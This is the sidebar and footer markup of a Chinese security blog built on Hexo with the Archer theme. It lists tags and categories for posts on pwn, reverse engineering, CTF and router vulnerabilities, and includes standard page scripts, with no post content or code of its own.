        <span class="sidebar-tag-name" data-tags="arm,pwn"><span class="iconfont-archer">&#xe606;</span>arm,pwn</span>
    
        <span class="sidebar-tag-name" data-tags="CCProxy,栈溢出,pwn"><span class="iconfont-archer">&#xe606;</span>CCProxy,栈溢出,pwn</span>
    
        <span class="sidebar-tag-name" data-tags="SQL注入,java,CVE-2018-16116,CVE-2018-16117"><span class="iconfont-archer">&#xe606;</span>SQL注入,java,CVE-2018-16116,CVE-2018-16117</span>
    
        <span class="sidebar-tag-name" data-tags="unlink,heap,pwn,Android"><span class="iconfont-archer">&#xe606;</span>unlink,heap,pwn,Android</span>
    
        <span class="sidebar-tag-name" data-tags="Heap,overflow,pwn"><span class="iconfont-archer">&#xe606;</span>Heap,overflow,pwn</span>
    
        <span class="sidebar-tag-name" data-tags="路由器,pwn,栈溢出"><span class="iconfont-archer">&#xe606;</span>路由器,pwn,栈溢出</span>
    
        <span class="sidebar-tag-name" data-tags="Rust,vscode,mac"><span class="iconfont-archer">&#xe606;</span>Rust,vscode,mac</span>
    
        <span class="sidebar-tag-name" data-tags="SSH,端口转发"><span class="iconfont-archer">&#xe606;</span>SSH,端口转发</span>
    
        <span class="sidebar-tag-name" data-tags="powerpc,汇编"><span class="iconfont-archer">&#xe606;</span>powerpc,汇编</span>
    
        <span class="sidebar-tag-name" data-tags="IDA,OllyDB"><span class="iconfont-archer">&#xe606;</span>IDA,OllyDB</span>
    
        <span class="sidebar-tag-name" data-tags="wireshark,TLS"><span class="iconfont-archer">&#xe606;</span>wireshark,TLS</span>
    
        <span class="sidebar-tag-name" data-tags="MSF,免杀"><span class="iconfont-archer">&#xe606;</span>MSF,免杀</span>
    
        <span class="sidebar-tag-name" data-tags="路由器,netgear,打包固件"><span class="iconfont-archer">&#xe606;</span>路由器,netgear,打包固件</span>
    
        <span class="sidebar-tag-name" data-tags="路由器,firmware-mod-kit,打包固件"><span class="iconfont-archer">&#xe606;</span>路由器,firmware-mod-kit,打包固件</span>
    
        <span class="sidebar-tag-name" data-tags="libc,pwn,free-libc"><span class="iconfont-archer">&#xe606;</span>libc,pwn,free-libc</span>
    
        <span class="sidebar-tag-name" data-tags="信息收集,社会工程学"><span class="iconfont-archer">&#xe606;</span>信息收集,社会工程学</span>
    
        <span class="sidebar-tag-name" data-tags="动态规划(DP)"><span class="iconfont-archer">&#xe606;</span>动态规划(DP)</span>
    
        <span class="sidebar-tag-name" data-tags="机器学习,TLS,流量监测"><span class="iconfont-archer">&#xe606;</span>机器学习,TLS,流量监测</span>
    
        <span class="sidebar-tag-name" data-tags="PWN,BROP,栈溢出"><span class="iconfont-archer">&#xe606;</span>PWN,BROP,栈溢出</span>
    
        <span class="sidebar-tag-name" data-tags="花指令,静态调试,Movfuscator"><span class="iconfont-archer">&#xe606;</span>花指令,静态调试,Movfuscator</span>
    
        <span class="sidebar-tag-name" data-tags="ACM,树状数组"><span class="iconfont-archer">&#xe606;</span>ACM,树状数组</span>
    
        <span class="sidebar-tag-name" data-tags="XCTF,逆向"><span class="iconfont-archer">&#xe606;</span>XCTF,逆向</span>
    
        <span class="sidebar-tag-name" data-tags="看雪,KCTF,逆向,PWN"><span class="iconfont-archer">&#xe606;</span>看雪,KCTF,逆向,PWN</span>
    
        <span class="sidebar-tag-name" data-tags="工具,python,Netcat"><span class="iconfont-archer">&#xe606;</span>工具,python,Netcat</span>
    
        <span class="sidebar-tag-name" data-tags="工具,python,proxy"><span class="iconfont-archer">&#xe606;</span>工具,python,proxy</span>
    
        <span class="sidebar-tag-name" data-tags="C,编译器"><span class="iconfont-archer">&#xe606;</span>C,编译器</span>
    
        <span class="sidebar-tag-name" data-tags="qiling,逆向"><span class="iconfont-archer">&#xe606;</span>qiling,逆向</span>
    
        <span class="sidebar-tag-name" data-tags="栈溢出,PWN"><span class="iconfont-archer">&#xe606;</span>栈溢出,PWN</span>
    
        <span class="sidebar-tag-name" data-tags="Linux,动态链接,GOT,PLT"><span class="iconfont-archer">&#xe606;</span>Linux,动态链接,GOT,PLT</span>
    
        <span class="sidebar-tag-name" data-tags="stunnel"><span class="iconfont-archer">&#xe606;</span>stunnel</span>
    
        <span class="sidebar-tag-name" data-tags="pwn,Heap"><span class="iconfont-archer">&#xe606;</span>pwn,Heap</span>
    
        <span class="sidebar-tag-name" data-tags="python,nmap,扫描器"><span class="iconfont-archer">&#xe606;</span>python,nmap,扫描器</span>
    
        <span class="sidebar-tag-name" data-tags="python,多线程"><span class="iconfont-archer">&#xe606;</span>python,多线程</span>
    
        <span class="sidebar-tag-name" data-tags="概率法求素数,算法"><span class="iconfont-archer">&#xe606;</span>概率法求素数,算法</span>
    
        <span class="sidebar-tag-name" data-tags="工具,python,arp_poison"><span class="iconfont-archer">&#xe606;</span>工具,python,arp_poison</span>
    
        <span class="sidebar-tag-name" data-tags="ACM,蓝桥杯"><span class="iconfont-archer">&#xe606;</span>ACM,蓝桥杯</span>
    
        <span class="sidebar-tag-name" data-tags="unlink,heap,pwn"><span class="iconfont-archer">&#xe606;</span>unlink,heap,pwn</span>
    
        <span class="sidebar-tag-name" data-tags="MBR,病毒"><span class="iconfont-archer">&#xe606;</span>MBR,病毒</span>
    
        <span class="sidebar-tag-name" data-tags="ctf,web,sql注入"><span class="iconfont-archer">&#xe606;</span>ctf,web,sql注入</span>
    
        <span class="sidebar-tag-name" data-tags="pwn,Format String Vulnerability"><span class="iconfont-archer">&#xe606;</span>pwn,Format String Vulnerability</span>
    
        <span class="sidebar-tag-name" data-tags="Linux,DirtyCow"><span class="iconfont-archer">&#xe606;</span>Linux,DirtyCow</span>
    
        <span class="sidebar-tag-name" data-tags="PWN,栈溢出"><span class="iconfont-archer">&#xe606;</span>PWN,栈溢出</span>
    
        <span class="sidebar-tag-name" data-tags="windows,影子账户"><span class="iconfont-archer">&#xe606;</span>windows,影子账户</span>
    
        <span class="sidebar-tag-name" data-tags="pwn,堆,glibc"><span class="iconfont-archer">&#xe606;</span>pwn,堆,glibc</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br>
    1、请确保node版本大于6.2<br>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="逆向"><span class="iconfont-archer">&#xe60a;</span>逆向</span>
    
        <span class="sidebar-category-name" data-categories="Pwn"><span class="iconfont-archer">&#xe60a;</span>Pwn</span>
    
        <span class="sidebar-category-name" data-categories="ACM"><span class="iconfont-archer">&#xe60a;</span>ACM</span>
    
        <span class="sidebar-category-name" data-categories="CTFweb"><span class="iconfont-archer">&#xe60a;</span>CTFweb</span>
    
        <span class="sidebar-category-name" data-categories="Linux"><span class="iconfont-archer">&#xe60a;</span>Linux</span>
    
        <span class="sidebar-category-name" data-categories="PWN"><span class="iconfont-archer">&#xe60a;</span>PWN</span>
    
        <span class="sidebar-category-name" data-categories="设备漏洞"><span class="iconfont-archer">&#xe60a;</span>设备漏洞</span>
    
        <span class="sidebar-category-name" data-categories="Rust"><span class="iconfont-archer">&#xe60a;</span>Rust</span>
    
        <span class="sidebar-category-name" data-categories="内网渗透"><span class="iconfont-archer">&#xe60a;</span>内网渗透</span>
    
        <span class="sidebar-category-name" data-categories="流量分析"><span class="iconfont-archer">&#xe60a;</span>流量分析</span>
    
        <span class="sidebar-category-name" data-categories="社工"><span class="iconfont-archer">&#xe60a;</span>社工</span>
    
        <span class="sidebar-category-name" data-categories="BlackHatTools"><span class="iconfont-archer">&#xe60a;</span>BlackHatTools</span>
    
        <span class="sidebar-category-name" data-categories="编译器开发"><span class="iconfont-archer">&#xe60a;</span>编译器开发</span>
    
        <span class="sidebar-category-name" data-categories="python工具"><span class="iconfont-archer">&#xe60a;</span>python工具</span>
    
        <span class="sidebar-category-name" data-categories="恶意代码"><span class="iconfont-archer">&#xe60a;</span>恶意代码</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "HackPluto"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


